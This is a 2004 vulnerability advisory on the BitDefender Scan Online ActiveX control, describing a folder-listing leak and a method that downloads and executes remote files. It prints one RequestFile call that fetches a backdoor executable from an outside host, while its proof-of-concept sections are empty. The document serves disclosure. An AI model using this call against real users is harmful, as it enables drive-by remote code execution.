~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:  BitDefender Scan Online (ActiveX)
Vendors:      http://www.bitdefender.com/scan/Msie/index.php
Platforms:    Windows
Bug:          Remote File Download & Execute & Private Information Disclosure
Risk:         High - Running Arbitrary Code
Exploitation: Remote with browser
Date:         19 Apr 2004
Author:       Rafel Ivgi, The-Insider
e-mail:       the_insider@mail.com
web:          http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of the BitDefender Scan Online description:

"BitDefender Scan Online is a fully functional antivirus product, with a
web-based interface and featuring all required elements for remotely
antivirus scanning and cleaning: it scans system's memory, all files,
folders and drives' boot sector, providing the user with the option to
automatically clean the infected files."

This is a quote of the page title:

"BitDefender AntiVirus - Data Security, AntiVirus Software, Free Protection"

The meaning of this sentence is very far from reality. I find it ridiculous
that an antivirus product will deliver and execute a virus on my system.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=======
2) Bugs
=======

"BitDefender Scan Online" downloads its components and registers the
following COM/ActiveX object:

    AVXSCANONLINE.AvxScanOnlineCtrl.1

with the following CLSID:

    80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has inconsistent protection: none of its
properties and methods can be set or accessed on an instance created from
script with:

    object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

They can only be set or accessed on an instance created by an HTML object
tag:

    ""

----------------------------------------------------------------------------
"BitDefender Scan Online" discloses the user's information, allowing a
remote page to list all drives and folders of the system using this simple
code:

------------------- CUT HERE -------------------
------------------- CUT HERE -------------------

----------------------------------------------------------------------------
"BitDefender Scan Online" contains a method that will ***DOWNLOAD A REMOTE
FILE AND EXECUTE IT ON THE SYSTEM***. For example:

    object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");

Since any web page can embed the control, a remote attacker only needs the
victim to visit a page that creates the object and calls RequestFile with
an attacker-controlled URL.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is Proof Of Concept code:

------------------- CUT HERE -------------------
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible, Can do the Impossible."